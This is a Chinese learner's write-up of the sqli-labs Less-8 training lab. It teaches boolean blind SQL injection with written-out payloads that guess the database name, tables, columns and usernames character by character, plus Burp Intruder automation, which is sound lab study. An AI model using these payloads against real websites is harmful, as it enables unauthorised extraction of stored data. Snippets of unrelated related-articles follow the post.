小白注入学习:sqli-labs--less8学习记录

Less8 布尔型盲注:

1.布尔盲注
网页代码仍然存在着SQL注入漏洞,但是当进行SQL注入时,页面不会回显任何数据,只会返回“right”或“wrong”即0和1。
需要通过构造SQL语句,来判断数据库信息的正确性,在通过页面的返回的“真”和“假”来识别判断是否正确,这就是布尔盲注。
Less8中 当SQL语句正确时,页面显示You are in......
当SQL语句错误时,页面啥也不显示
初步满足布尔型盲注的特点
2.确定注入类型、方法
?id=1‘ and 1=1 --+ 页面显示You are in...
?id=1‘ and 1=2 --+ 页面啥也不显示
确定这是一个布尔型的盲注,根据回显判断语句是否正确来注入。
3.通过left()函数构造payload
left(a,b)从a左侧截取前b位
再根据页面的显示判断当前SQL语句是否正确。
(1)猜解数据库名长度
?id=1‘ and length(database())=8 --+
页面显示You are in......
//ps小白注释:这句话=你在问数据库名的长度是8嘛,数据库回答You are in......说明数据库名长度是8。下面的与此类似
(2)猜解数据库名
?id=1‘ and left(database(),1)=‘s‘--+
页面显示You are in......
//ps小白注释:=问数据库名的第一位是s嘛,数据库回答You are in......说明猜想正确
?id=1‘ and left(database(),2)=‘se‘--+
页面显示You are in......
//ps小白注释:=问数据库名的前两位是se嘛,数据库回答You are in......说明猜想正确
根据此方法,一个字符字符的猜解出数据库名为security
(3)
猜解表名,字段,以及字段内容的操作都一样,结合limit()函数从第一条数据查找,根据页面回显判断是否正确。附上部分payload
猜解表名
?id=1‘ and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=‘e‘--+
猜解字段
?id=1‘ and left((select column_name from information_schema.columns where table_name = ‘users‘ limit 0,1),1)=‘i‘--+
猜解字段内容
?id=1‘ and left((select username from users limit 0,1),1)=‘d‘--+
4.结合burpsuit进行猜解
布尔盲注猜解确实比较麻烦耗时间,这里介绍一种结合burpsuit进行猜解的方法。以数据库名为例。

布尔盲注猜解确实比较麻烦耗时间,这里介绍一种结合burpsuit进行猜解的方法。以数据库名为例。
(1)通过burpsuit抓包,抓取我们的猜解数据库名的请求


(2)把请求发送到Intruder下选中参数

清除掉所有标记后,在猜解的参数上加入新的标记


(3)修改payload设置为Brute forcer并选取猜解范围


(4)获取到参数值

根据Length排序后,会发现在参数为 s 下有You are in,故数据库第一位为s,以此类推猜解剩余内容

PS:小白总结

(1)布尔盲注就相当于A问B问题,B只能回答是、否,A通过B的回答来判断自己的猜想。

(2)手工盲注相对较为复杂繁琐,可以结合工具进行协助注入。如burpsuit,sqlmap、小脚本

(3)与 left() 相似的函数还有 substr() 这两个函数都可以结合 ascii() 函数配合注入能应对单引号 ‘ 被过滤的场景。

  substr(a,b,c) 从 b 位置开始截取字符串 a 的 c 长度  ascii() 将字符串转换为asii码形式

小白注入学习记录!!

原文地址:https://www.cnblogs.com/ersuani/p/sqlilab_less8.html

时间: 2024-08-05 17:20:55

小白注入学习:sqli-labs--less8学习记录的相关文章

Android so注入(inject)和Hook技术学习(三)——Got表hook之导出表hook

前文介绍了导入表hook,现在来说下导出表的hook.导出表的hook的流程如下.1.获取动态库基值 1 void* get_module_base(pid_t pid, const char* module_name){ 2 FILE* fp; 3 long addr = 0; 4 char* pch; 5 char filename[32]; 6 char line[1024]; 7 8 // 格式化字符串得到 "/proc/pid/maps" 9 if(pid < 0){

3. XML实体注入漏洞的利用与学习

XML实体注入漏洞的利用与学习 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发的安全问题.在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了"污染"源,在对XML文档处理后则可能导致信息泄漏等安全问题 漏洞利用 当允许引用外部实体时,通过构造恶意内容,可导

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

怎样找到一份深度学习的工作(附学习材料,资源与建议)

原文地址:How to get a job in deep learning 原文翻译与校对:@戴丹 && @胡杨 && 寒小阳 时间:2016年10月. 出处:http://blog.csdn.net/han_xiaoyang/article/details/52777661 声明:版权所有,转载请联系作者并注明出 如果你是一个软件工程师(或者你现在正在学习这一方面),你肯定有机会听说过深度学习(有时候深度学习缩写为"DL").它现在是一个热门.且快速

[Python学习]一、如何学习,学习资料

上手Python快一年了,用Python也开发了不少工具.项目,准备写一个系列来整理Python的学习. 1.Python的介绍: Python是一种面向对象的.解释型语言,发明与1989年. Python是一种高级语言,它在底层实现许多高级的数据结构,使得编程变得非常容易. Python的库非常丰富,它是大数据处理常用的语言的.开发快,效率相对高. Python应用广泛.比如豆瓣就是依靠Python实现的. Python运行平台广泛. 目前Python的版本已经到3.4, 但是Python2

ijwmh1-2-以前学习整理出来的学习内容--什么是变量1整型变量

崧闱旭 ijwmh1-2-以前学习整理出来的学习内容--什么是变量1整型变量

如何学习ruby?Ruby学习技巧分享

怎么学习ruby?在学习ruby之前需要掌握哪些知识呢?这是很多想要学习ruby朋友的心声,我不具体给出答案,下面就给大家讲讲一位前辈学习ruby(http://www.maiziedu.com/course/ruby/)的学习历程吧.在大学时学的电子专业,在学校里学过C/汇编,在学习ruby前期,和大多数的Rubyist一样,我也是从学习Rails开始去了解Ruby的,在学习Rails之前,我正在使用JavaEE的SSH框架(struts+spring+hibernate), 当时也算是Jav

数据库学习网站和linux学习网站

Oracle ITPub论坛 http://www.itpub.net 著名IT技术论坛.尤以数据库技术闻名. ITPUB论坛的前身应该是建立在 smiling 的 oracle小组,他们搬家前的主页应该是在下面的这个地址吧! http://oracle.myrice.com/ CNOUG论坛 http://www.cnoug.org/ oracle中国用户组,高手云集,讨论Oracle数据库安装.管理.备份.恢复.性能优化: Oracle数据库高级技术HA.VLDB.ORACLE INTERN